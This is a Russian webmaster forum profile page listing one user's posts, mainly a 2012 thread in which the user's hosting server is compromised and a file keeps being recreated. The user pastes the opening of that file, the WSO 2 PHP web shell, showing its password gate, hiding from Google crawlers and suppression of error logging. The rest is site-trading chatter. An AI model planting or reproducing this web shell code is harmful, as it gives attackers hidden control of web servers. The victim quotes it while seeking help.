Комментарии - visavi - Профиль вебмастера - Форум об интернет-маркетинге

Взлом сервера

19 мая 2012, 12:31

спасибо за советы. За комп вроде спокоен (удалил установленный нод, поставел касперского интернет секьюрити, запустил полную глубокую проверку всех дисков... в исполнительных вирусов не нашел, было несколько в архиве на диске d (система на c), но это архив - бекап за прошедшую неделю сервера, видимо уже с зараженными, почистил на сервере (посмотрел пути в архиве).

Но эта гадость лезет. На сервере 44 сайта, файл создается только в одном сайте с названием s25.php размером 66094 b и главное я его удаляю, через 2 минуты снова создается. Пароли все сменил, кеш почистил браузеров, убрал галочку запоминания паролей, на сервере полностью закрыл доступ по ftp. не помогает.

Вот часть кода с этого файла:

<?php
/**
* WSO 2
* Web Shell by oRb
*/
#$auth_pass = "63a9f0ea7bb98050796b649e85481845";
$color = "#df5";
$default_action = 'FilesMan';
@define('SELF_PATH', __FILE__);

if( strpos($_SERVER['HTTP_USER_AGENT'],'Google') !== false ) {
header('HTTP/1.0 404 Not Found');
exit;
}
@session_start();
@error_reporting(0);
@ini_set('error_log',NULL);
@ini_set('log_errors',0);
@ini_set('max_execution_time',0);
@set_time_limit(0);
@set_magic_quotes_runtime(0);
@define('VERSION', '2.2');
if( get_magic_quotes_gpc() ) {
function stripslashes_array($array) {
return is_array($array) ? array_map('stripslashes_array', $array) : stripslashes($array);
}
$_POST = stripslashes_array($_POST);
}
function printLogin() {
?>
<center>
<form method=post>
Password: <input type=password name=pass><input type=submit value='>>'>
</form></center>
<?php
exit;
}
if( !isset( $_SESSION[md5($_SERVER['HTTP_HOST'])] ))
if( empty( $auth_pass ) ||
( isset( $_POST['pass'] ) && ( md5($_POST['pass']) == $auth_pass ) ) )
$_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
else
printLogin();

Ума не приложу где теперь копать

В журнале операций пусто, только мои операции по удалению этого файла, в логах сайта, в логах сервера во время создания этого файла - ничего...

поддержка ответила:

Вижу все входы по FTP с ххх.ххх.73.2
входов по ssh В Мае не было
в ISPmanager все входы в Мае только с этого же ip

Взлом сервера

17 мая 2012, 15:38

да под виндовс

Взлом сервера

17 мая 2012, 15:12

Rxp:
Большая вероятность, что вам залили шелл, потомуи не помогает изменения паролей и др. действия.

Как его можно выявить?

PS. Комп проверял установленным нодом пятеркой и дестопным др. вебером - чист

Продлить домен у moniker.com

16 мая 2012, 16:53

Спасибо, уже продлили. Не актуально.

Строительство | тИЦ 10 | доход в Sape | Аукцион

17 апреля 2012, 19:21

укажите домен, у кого зарегистрирован

Ошибка 504

19 февраля 2012, 14:37

менял тему (ставил стандартную) - ничего не помогло, левых урлов с главной в коде не нашел..

Продам сайтик, тиц 10, пр2, DMOZ, Y-G, miralinks

29 декабря 2011, 18:16

Интересно , стукните в аську

Продажа сайтов с доходом и с тиц.

25 августа 2011, 20:19

Купил сайты № 4,6,7. Покупаю у ТС не первый раз, сделал приятную скидочку. Спасибо.

Расспродажа сайтов с тиц от 10 до 20 и пр от 1 до 4

18 июля 2011, 17:29

Купил сайт №7, сделка прошла быстро, немножко ТС уступил в цене. Спасибо.

Меняю правила! Домены с Тиц10 от 150р / Домены с Тиц20 от 650р

16 июля 2011, 08:45

купил домен все прошло быстро. Приятно иметь дело. Спасибо.

VK приобрела 70% в структуре компании-разработчика red_mad_robot

Все что нужно знать о DDоS-атаках грамотному менеджеру

visavi